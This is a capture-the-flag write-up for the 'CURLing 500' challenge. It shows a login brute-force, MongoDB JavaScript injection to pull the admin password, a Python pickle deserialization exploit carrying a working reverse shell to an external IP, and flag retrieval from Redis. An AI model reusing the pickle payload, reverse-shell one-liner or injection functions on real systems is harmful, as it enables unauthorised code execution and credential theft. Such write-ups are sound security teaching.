CURLing 500 - Hockey Field Management System

First step was to bruteforce the authentication form with Burp intruder
     => debug : debug

After seeing "return version();" outputs 2.4.9, we figured out this was mongodb.
We already knew there is an admin account registered as the login form outputs 2 different errors:
* Invalid login - when user is wrong
* Invalid password - when just password is wrong

So next step was to extract the admin password from mongodb:
function()
{
	var a = '';
	for(var key in db.getCollection('users').find().toArray()[0])
	{
		a = a.concat(key,', ')
	}
	
	return "".concat(a)
}
     => _id, login, pwd

function()
{
	return "".concat(db.getCollection('users').find().toArray()[1].pwd)
}
     => firststeptoflag-done <- admin password

Next part was a Python pickle exploit, we can execute code on the server using Python pickle.
Run the code signer.
import pickle, os

REVERSE_SHELL = """\
python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("54.229.84.61",1337));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'"""
     
class RunCmd(object):
    def __reduce__(self):
        return (os.system, (REVERSE_SHELL,))
     
s = {'timelimit': (None, None), 'utc': True, 'chord': None, 'args': (23, 42), 'retries': 0, 'expires': None, 'task': 'app.test_task', 'callbacks': None, 
'errbacks': None, 'taskset': None, 'kwargs': {}, 'eta': None, 'id': 'a3d9c986-c461-45f0-93fa-9b0e929a2b37', 'payload':RunCmd()}
 

After reading app.py we found redis data structure server is used and we were also able to get the redis password from the source code.
Now we just had to do the final trick:

redis-cli -a pwd
GET flag
     => CTF{...}